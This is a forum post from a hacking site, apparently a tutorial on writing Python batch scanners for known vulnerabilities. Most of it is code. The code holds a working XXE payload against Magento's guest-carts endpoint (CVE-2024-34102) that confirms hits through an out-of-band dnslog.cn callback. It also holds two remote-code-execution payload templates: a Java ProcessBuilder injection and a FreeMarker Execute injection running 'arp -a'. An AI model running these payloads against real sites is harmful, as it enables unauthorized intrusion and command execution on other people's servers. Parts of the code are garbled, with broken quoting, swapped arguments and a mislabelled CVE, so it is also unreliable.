Jump to content

Title: Quickly write a python vulnerability batch detection tool

UKhackteam
UKhackteam
in Hacker Cracking / Penetration Testing / Cybersecurity

Featured Replies

Posted

1. Preface

The following detection scripts are shown in the column:

import requests

import urllib3

import re,string,random

from urllib.parse import urljoin

import argparse

import time

import ssl

ssl._create_default_https_context=ssl._create_unverified_context

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def banner():

print()

print(r''''

____________ _____ _____ ____ _____ _____ _____ ____

/___\ \//____| |___ \/_ \___ \| || |___ \/_ \___//_

| | \ \//| _| _____ __) | | | | | | | |_____ ___) | | | | | | | |//'_ \

| |___ \ V/| |________/__/| |_|/__/|________/__/| |_| |//| (_) |

\____| \_/|______| |______|\___/_____| |______|\____//\___/

_____

|___ |

//

//

/_/

''')

print()

def read_file(file_path):

with open(file_path, 'r') as file:

urls=file.read().splitlines()

Return urls

def check(url):

url=url.rstrip('/')

taeget_url=urljoin(url, '/rest/V1/guest-carts/1/estimate-shipping-methods')

try:

headers={

'User-Agent': 'Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36',

'Content-Type': 'application/json'

}

getdomain=requests.get(url='http://dnslog.cn/getdomain.php', headers={'Cookie': 'PHPSESSID=hb0p9iqh804esb5khaulm8ptp2'}, timeout=30)

domain=str(getdomain.text)

data=''{'address':{'totalsCollector':{'collectorList':{'totalCollector':{'sourceData':{'data':{'data':'http://%s','dataIsURL':true,'options':12345678}}}}}}}'''%(domain)

requests.post(taeget_url, verify=False, headers=headers, data=data, timeout=25)

for i in range(0, 3):

refresh=requests.get(url='http://dnslog.cn/getrecords.php', headers={'Cookie': 'PHPSESSID=hb0p9iqh804esb5khaulm8ptp2'}, timeout=30)

time.sleep(1)

if domain in refresh.text:

print(f'\033[31mDiscovered:{url}:AdobeMagento_CVE-2024-34102_XXE!\033[0m')

return True

except Exception as e:

pass

if __name__=='__main__':

banner()

parser=argparse.ArgumentParser(description='AdobeColdFusion_CVE-2024-20767_ArbitraryFileRead detection script')

parser.add_argument('-u', '--url',type=str, help='single URL detection')

parser.add_argument('-f', '--txt',type=str, help='Batch URL file load detection')

args=parser.parse_args()

if args.url:

read_file(args.url)

elif args.txt:

check(args.txt)

else:

parser.print_help()

The main functional points of the above batch detection code:

1. Banner function module, used to display graphical logos to beautify the display script

2. read_file function module, used to batch read url addresses in files

3. Check function module, used to detect vulnerabilities. It is best to use BP for construction here and match rules based on the return value in the response package.

4. The main function module mainly calls the above three functions and references the command line parser

2. Import python package

You can use the python PyCharm Community error function to detect the package that needs to be imported.

import requests

import urllib3

import re,string,random

from urllib.parse import urljoin

import argparse

import time

import ssl

ssl._create_default_https_context=ssl._create_unverified_context

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

image-20240801024603100

3. Function function module

1.banner identification function function

def banner():

print()

print(r''''

____________ _____ _____ _____ _____ _ _____

/___\ \//____| |___ \/_ \___ \| || |___ /| || || |/|/_ \

| | \ \//| _| _____ __) | | | | | |__) | | | |____ |_ \| || |_| | | | | | | | | |

| |___ \ V/| |________/__/| |_|/__/|___ _|_______|___) |__ _| | |_| |

\____| \_/|______| |______|\___/_____| |_____/|_| |____/|_| |_|\____/

____

|___ \

__) |

/__/

|______|

''')

print()

Function: This function prints a graphical banner

Online generation tool: http://www.network-science.de/ascii/

Or use pyfiglet for local generation, and the generated code can be replaced in python code.

pip install pyfiglet

C:\Users\testpyfiglet CVE-2024-34102

____________ _____ _____ _____ _____ _ _____

/___\ \//____| |___ \/_ \___ \| || |___ /| || || |/|/_ \

| | \ \//| _| _____ __) | | | | | |__) | | | |____ |_ \| || |_| | | | | | | | | |

| |___ \ V/| |________/__/| |_|/__/|___ _|_______|___) |__ _| | |_| |

\____| \_/|______| |______|\___/_____| |_____/|_| |____/|_| |_|\____/

____

|___ \

__) |

/__/

|______|

2.read_file function module

Function: This function reads each line in the specified file and returns a list containing the contents of these lines (assuming it is a URL).

Note: This code module can be fixed and unchanged def read_file(file_path): #Define a function named read_file, which accepts a parameter file_path, indicating the path of the file

with open(file_path, 'r') as file:

# Use the open function to open the file with the specified path in read mode ('r') and assign the file object to the variable file. The with statement ensures that the file will be automatically closed after the code block is finished.

urls=file.read().splitlines()

#Read the entire contents of the file and split it into a list by line. The content of each line serves as an element of the list. Splitlines() method removes the newlines of each line

return urls #Return a list of all URLs

3.check function module

Note: Here you can modify def check(url): according to actual conditions

#Define a function named check, accepts a parameter url, indicating the URL to be checked

url=url.rstrip('/')

# Remove the slash at the end of the URL (if any)

taeget_url=urljoin(url, '/rest/V1/guest-carts/1/estimate-shipping-methods')

#Use the urljoin function to splice the given URL with the specified path to generate the target URL

try:

#Try to execute the following code block, if an exception occurs, jump to the except block

headers={

'User-Agent': 'Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36',

'Content-Type': 'application/json'

}

#Set HTTP request headers, headers include User-Agent and Content-Type, Content-Type is the post request package format

getdomain=requests.get(url='http://dnslog.cn/getdomain.php', headers={'Cookie': 'PHPSESSID=hb0p9iqh804esb5khaulm8ptp2'}, timeout=30)

#Send a GET request to dnslog.cn to obtain a unique domain name, which will be used to detect vulnerabilities.

domain=str(getdomain.text)

#Convert the response content to a string and assign the value to the variable domain

data=''{'address':{'totalsCollector':{'collectorList':{'totalCollector':{'sourceData':{'data':{'data':'http://%s','dataIsURL':true,'options':12345678}}}}}}}'''%(domain)

#Construct a JSON data string containing domain, with the purpose of exploiting this vulnerability

requests.post(taeget_url, verify=False, headers=headers, data=data, timeout=25)

#Send a POST request to the target URL, carrying constructed JSON data

for i in range(0, 3):

#Change 3 times to check whether the DNS record contains the domain name

refresh=requests.get(url='http://dnslog.cn/getrecords.php', headers={'Cookie': 'PHPSESSID=hb0p9iqh804esb5khaulm8ptp2'}, timeout=30)

#Send a request to dnslog.cn to obtain DNS records

time.sleep(1)

if domain in refresh.text:

#If the domain name is included in the DNS record, it means that the vulnerability exists

print(f'\033[31mDiscovered:{url}:AdobeMagento_CVE-2024-34102_XXE!\033[0m')

#Print information about vulnerabilities found

return True

#Return True to indicate that a vulnerability was detected

except Exception as e:

#If any exception occurs when trying to execute the above code, catch the exception and ignore it

pass

The main method of detecting functions: get type def check(url):

url=url.rstrip('/')

target=url+'/url path'

headers={

'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36'

}

try:

#get request method

response=urllib.request.Request(target, headers=headers, method='GET', unverifiable=True)

res=urllib.request.urlopen(response)

status_code=res.getcode()

content=res.read().decode()

if status_code==200 and 'fonts' in content and 'extensions' in content:

#The main matching vulnerability verification rules

print(f'\033[31mDiscovered:{url}: Vulnerability status description, such as (xxx has an RCE vulnerability)\033[0m')

except Exception as e:

pass

post type def check1(url):

url=url.rstrip('/')

target=urljoin(url, '/url path')

headers={

'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36',

'Content-Type':' application/json;charset=UTF-8' #post data format type

}

#post request data

data='{'ParamName':'','paramDesc':'','paramType':'','sampleItem':'1','mandatory':true,'requiredFlag':1,'validationRules':'function verification(data){a=new java.lang.ProcessBuilder(\\\'echo\\\',\\\'HelloWorldTest\\\').start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line=r.readLine()) !=null){ss+=line};return ss;}'}'

try:

#POST request method

response=requests.post(target, verify=False, headers=headers, data=data, timeout=15)

if response.status_code==200 and 'HelloWorldTest' in response.text and 'message' in response.text and 'data' in response.text: #Main verification rules for matching vulnerabilities

print(f'\033[31mDiscovered:{url}: Vulnerability status description, such as (xxx has an rce vulnerability!\033[0m')

return True

except Exception as e:

pass

def check2(url):

url=url.rstrip('/')

target=urljoin(url, '/jc6/platform/portalwb/portalwb-con-template!viewConTemplate.action')

headers={

'User-Agent': 'Mozilla/2.0 (compatible; MSIE 3.01; Windows 95',

'Content-Type': 'application/x-www-form-urlencoded'

}

data='''modulId=1code=%253Cclob%253E%2524%257B%2522freemarker.template.utility.Execute%2522%253Fnew%2528%2529%2528%2522arp%2520-a%2522%2529%257D%253C%252Fclob%253Euuid=1''

try:

response=requests.post(target, verify=False, headers=headers, data=data, timeout=15)

if response.status_code==200 and ' Internet' in response.text and '/clob' in response.text:

#The main matching vulnerability verification rules

print(f'\033[31mDiscovered:{url}: Vulnerability status description, such as (xxx has an rce vulnerability!\033[0m')

return True

except Exception as e:

pass

IV. Main function function module

Function: Call the function above

This part is the entry of the script, parsing command line parameters, and if the --url parameter is provided, a single URL is detected; if the --txt parameter is provided, multiple URL addresses in the file are detected.

if __name__=='__main__':

#Call the banner function and display the above identification diagram

banner()

#Command line parameter parser

parser=argparse.ArgumentParser(description='AdobeColdFusion_CVE-2024-20767_ArbitraryFileRead detection script')

parser.add_argument('-u', '--url',type=str, help='single URL detection')

parser.add_argument('-f', '--txt',type=str, help='Batch URL file load detection')

  • Quote

    • Join the conversation

    You can post now and register later. If you have an account, sign in now to post with your account.
    Note: Your post will require moderator approval before it will be visible.

    Guest
    Reply to this topic...
    Go to topic listing

    Important Information

    HackTeam Cookie PolicyWe have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.